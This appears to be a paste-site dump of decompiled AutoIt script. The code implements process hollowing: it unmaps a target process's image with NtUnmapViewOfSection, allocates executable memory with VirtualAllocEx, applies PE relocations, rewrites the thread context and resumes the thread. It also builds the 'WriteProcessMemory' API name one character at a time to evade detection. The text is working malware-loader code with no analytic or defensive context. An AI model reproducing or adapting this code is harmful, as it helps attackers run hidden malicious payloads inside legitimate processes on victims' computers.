- IF @ERROR OR NOT $1W[0]THEN
- DLLCALL("kernel32.dll","bool","TerminateProcess","handle",$1X,"dword",0)
- RETURN SETERROR(9,0,0)
- ENDIF
- SWITCH $1Z
- CASE 1
- DLLSTRUCTSETDATA($20,"Eax",$2L+$2C)
- CASE 2
- DLLSTRUCTSETDATA($20,"Rcx",$2L+$2C)
- CASE 3
- ENDSWITCH
- $1W=DLLCALL("kernel32.dll","bool","SetThreadContext","handle",$1Y,"ptr",DLLSTRUCTGETPTR($20))
- IF @ERROR OR NOT $1W[0]THEN
- DLLCALL("kernel32.dll","bool","TerminateProcess","handle",$1X,"dword",0)
- RETURN SETERROR(10,0,0)
- ENDIF
- $1W=DLLCALL("kernel32.dll","dword","ResumeThread","handle",$1Y)
- IF @ERROR OR $1W[0]=-1 THEN
- DLLCALL("kernel32.dll","bool","TerminateProcess","handle",$1X,"dword",0)
- RETURN SETERROR(11,0,0)
- ENDIF
- DLLCALL("kernel32.dll","bool","CloseHandle","handle",$1X)
- DLLCALL("kernel32.dll","bool","CloseHandle","handle",$1Y)
- RETURN DLLSTRUCTGETDATA($1V,"ProcessId")
- ENDFUNC
- FUNC _6H()
- LOCAL $2X[18]=["W","r","i","t","e","P","r","o","c","e","s","s","M","e","m","o","r","y"],$2Y
- FOR $2Z IN $2X
- $2Y&=$2Z
- NEXT
- RETURN $2Y
- ENDFUNC
- FUNC _6I($2N,$30,$31,$32,$33)
- LOCAL $34=$31-$32
- LOCAL $35=DLLSTRUCTGETSIZE($30)
- LOCAL $36=DLLSTRUCTGETPTR($30)
- LOCAL $37,$38
- LOCAL $2S,$39,$3A
- LOCAL $3B,$3C,$3D
- LOCAL $12=3+7*$33
- WHILE $38<$35
- $37=DLLSTRUCTCREATE("dword VirtualAddress; dword SizeOfBlock",$36+$38)
- $2S=DLLSTRUCTGETDATA($37,"VirtualAddress")
- $39=DLLSTRUCTGETDATA($37,"SizeOfBlock")
- $3A=($39-8)/2
- $3B=DLLSTRUCTCREATE("word["&$3A&"]",DLLSTRUCTGETPTR($37)+8)
- FOR $2V=1 TO $3A
- $3C=DLLSTRUCTGETDATA($3B,1,$2V)
- IF BITSHIFT($3C,12)=$12 THEN
- $3D=DLLSTRUCTCREATE("ptr",$2N+$2S+BITAND($3C,4095))
- DLLSTRUCTSETDATA($3D,1,DLLSTRUCTGETDATA($3D,1)+$34)
- ENDIF
- NEXT
- $38+=$39
- WEND
- RETURN 1
- ENDFUNC
- FUNC _6J($1X,$3E,$35)
- LOCAL $1W=DLLCALL("kernel32.dll","ptr","VirtualAllocEx","handle",$1X,"ptr",$3E,"dword_ptr",$35,"dword",4096,"dword",64)
- IF @ERROR OR NOT $1W[0]THEN
- $1W=DLLCALL("kernel32.dll","ptr","VirtualAllocEx","handle",$1X,"ptr",$3E,"dword_ptr",$35,"dword",12288,"dword",64)
- IF @ERROR OR NOT $1W[0]THEN RETURN SETERROR(1,0,0)
- ENDIF
- RETURN $1W[0]
- ENDFUNC
- FUNC _6K($1X,$35)
- LOCAL $1W=DLLCALL("kernel32.dll","ptr","VirtualAllocEx","handle",$1X,"ptr",0,"dword_ptr",$35,"dword",12288,"dword",64)
- IF @ERROR OR NOT $1W[0]THEN RETURN SETERROR(1,0,0)
- RETURN $1W[0]
- ENDFUNC
- FUNC _6L($1X,$3E)
- DLLCALL("ntdll.dll","int","NtUnmapViewOfSection","ptr",$1X,"ptr",$3E)
- IF @ERROR THEN RETURN SETERROR(1,0,0)
- RETURN 1
- ENDFUNC
- FUNC _6M($1X)
- LOCAL $1W=DLLCALL("kernel32.dll","bool","IsWow64Process","handle",$1X,"bool*",0)
- IF @ERROR OR NOT $1W[0]THEN RETURN SETERROR(1,0,0)
- RETURN $1W[2]
- ENDFUNC
- ; DeTokenise by myAut2Exe >The Open Source AutoIT/AutoHotKey script decompiler< - dmod 2.12 build(269)
Add Comment
Please, Sign In to add comment